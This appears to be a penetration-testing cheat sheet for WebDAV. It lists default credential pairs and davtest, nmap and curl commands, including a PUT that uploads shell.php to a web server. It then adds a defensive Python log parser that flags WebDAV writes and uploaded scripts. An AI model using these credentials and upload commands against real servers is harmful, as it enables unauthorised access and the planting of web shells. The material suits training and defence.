
Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to allow people to create and modify web sites using HTTP. It was originally started in 1996, when this didn’t seem like a terrible idea. I don’t see that often on recent HTB machines, but I did come across it in PWK/OSCP.

user pass
wampp wampp
jigsaw jigsaw


davtest -url http://$IP/webdav/
davtest -url http://$IP/ -auth "$USER:$PASS"


sudo nmap --script http-iis-webdav-vuln -p80 $IP

GET request

curl "http://$IP/webdav/" --user "wampp:wampp"
curl "http://$IP/webdav/" --user "jigsaw:jigsaw"
curl "http://$IP/webdav/" --user "$USER:$PASS"

PUT request

curl -T "proof.txt" "http://$IP/"
curl -T "proof.txt" "http://$IP/" --user "$USER:$PASS"
curl -T "shell.php" "http://$IP/webdav/" --user "administrant:sleepless"

Connect with an FTP-like client

cadaver http://$IP/webdav
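
A defender-side counterpart to the PUT requests above, as an added example that is not part of the original notes: it scans web server access logs in Combined Log Format for successful WebDAV writes, and flags anonymous writes and uploaded script files that are requested afterwards. The log lines, the `davuser` account and the extension list are constructed assumptions.

```python
import re

# Methods that create or change content on a WebDAV-enabled server.
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "COPY", "MOVE", "PROPPATCH"}
# Extensions a server may execute instead of serving statically (assumed list).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|asp|aspx|jsp|cgi)$", re.I)
# Combined Log Format prefix: ip ident user [time] "METHOD path proto" status size
LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')

def find_webdav_writes(lines):
    """Return {path: set of flags} for paths touched by a successful write."""
    flags = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                      # not a Combined Log Format line
        ip, user, method, path, status = m.groups()
        path = path.split("?", 1)[0]      # compare on the file, not the query
        ok = status.startswith("2")       # 201/204 = write accepted
        if method in WRITE_METHODS and ok:
            f = flags.setdefault(path, {"write"})
            if user == "-":
                f.add("anonymous")        # write accepted without credentials
            if method == "PUT" and SCRIPT_EXT.search(path):
                f.add("script-upload")
        elif method in ("GET", "POST") and ok and "script-upload" in flags.get(path, ()):
            flags[path].add("requested-after-upload")
    return flags

# Constructed sample log (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "PROPFIND /webdav/ HTTP/1.1" 401 381',
    '192.0.2.10 - davuser [01/Jan/2024:10:00:05 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 1024',
    '192.0.2.10 - davuser [01/Jan/2024:10:00:09 +0000] "PUT /webdav/shell.php HTTP/1.1" 201 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /webdav/shell.php HTTP/1.1" 200 12',
    '192.0.2.11 - - [01/Jan/2024:10:05:00 +0000] "PUT /proof.txt HTTP/1.1" 201 0',
    '192.0.2.12 - - [01/Jan/2024:10:06:00 +0000] "PUT /notes.php HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for path, f in find_webdav_writes(SAMPLE_LOG).items():
        print(path, sorted(f))
```

A rejected write (the 403 above) produces no finding, so the output lists only content that actually landed on the server.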